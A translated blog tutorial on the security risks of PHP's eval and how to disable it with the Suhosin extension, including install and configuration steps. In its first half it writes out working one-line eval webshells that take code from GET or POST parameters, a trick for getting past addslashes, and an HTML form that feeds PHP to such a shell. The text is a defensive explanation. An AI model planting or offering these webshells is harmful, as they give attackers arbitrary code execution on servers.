How to ban eval with security risks in php

Before the website was attacked by hackers, we learned that the eval function of PHP has great security risks. Today we will introduce the method of disabling eval. You can refer to it if necessary.

Some time ago, the website was invaded by hackers. Later, during the investigation, a php was found with very little content:

<?php eval($_POST[asda123131323156341]);?>

Then I searched the eval function of PHP online and found that this eval function has great security risks.

Test it locally, write a php in the local environment, the content is as follows:

default.php:

<?php eval($_GET[asda]);?>

Then visit: localhost/test/default.php?asda =phpinfo();

You can see that phpinfo has been executed.

Or visit localhost/test/default.php?asda = echo 11111; you will also find that 1111 is echoed out.

Similar methods include:

<?php $code="${${eval($_GET[c])}}";?>

Visit localhost/test/default.php?c=phpinfo(); and you will see

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

Visit localhost/test/ default.php?c= ${${phpinfo()}}; you can see

Use the eval function that can execute php. Hackers can use this to upload some background Trojans, such as uploading php, and then Access this php via url to gain greater permissions. This type of intrusion is called a one-sentence Trojan. For example: write an html with the following content:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

Then write a default.php with the content:

<?php eval($_POST[c]);?>

In this case, you can directly submit whatever php you want to execute. Just run it.

So: eval() has great destructive power for PHP security. The eval function weakens the security of your application. Therefore, it is generally not used in order to prevent Trojan horse intrusion similar to the following sentence. Need to be banned!

However, many methods on the Internet that use disable_functions to disable eval are wrong!

In fact, eval() cannot be disabled using disable_functions in php.ini:

because eval() is a language construct and not a function

eval is zend , so it is not a PHP_FUNCTION function;

So how does PHP prohibit eval?

If you want to disable eval, you can use the php extension Suhosin:

After installing Suhosin, load Suhosin.so in php.ini, and add suhosin.executor.disable_eval = on. !

Summary, php's eval function cannot be disabled in php, so we can only use plug-ins!

As for the steps to install suhosin to disable the eval function: (not tested)

Instructions:

php installation directory:/usr/local/php5

php.ini configuration file path:/usr/local/php5/etc/php.ini

Nginx installation directory:/usr/local/nginx

Nginx website root directory:/usr/ local/nginx/html

1. Install the compilation tool

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2. Install suhosin

cd /usr/local/src   #进入软件包存放目录
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下载
tar zxvf suhosin-0.9.33.tgz   #解压
cd suhosin-0.9.33   #进入安装目录
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #编译
make install   #安装
安装完成之后，出现下面的界面，记住以下路径，后面会用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模块路径

3. Configure php to support suhosin

vi /usr/local/php5/etc/php.ini  
 #编辑配置文件，在最后一行添加以下内容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

Note: suhosin The function of .executor.disable_eval = on is to disable the eval function

4, test

vi /usr/local/nginx/html/phpinfo.php #Edit

<?php
phpinfo();
?>

: wq! #Save and exit

service php-fpm restart #Restartphp-fpm

service nginx restart #Restart nginx

Note: If it is apache, it is the same, just restart apache.

Open phpinfo.php in your browser, as shown in the figure below, you can see suhosin related information

At this point, the suhosin installation of PHP under Linux is completed!

Note: What will be the consequences after disabling eval? First of all, software that uses eval in the code will not be able to use it, such as the famous Discuz! Forum and PHPWind Forum will not be able to be used normally, and it will also affect the old version of phpMyAdmin. If it is updated to the latest 3.2.5, it can be used, but it is available by default. For a warning prompt, add $cfg['SuhosinDisableWarning']=true;

to config.inc.php to cancel this warning.

Note: In addition to eval, assert is also used similarly.

Recommended learning: php video tutorial

The above is the detailed content of How to ban eval with security risks in php. For more information, please follow other related articles on the PHP Chinese website!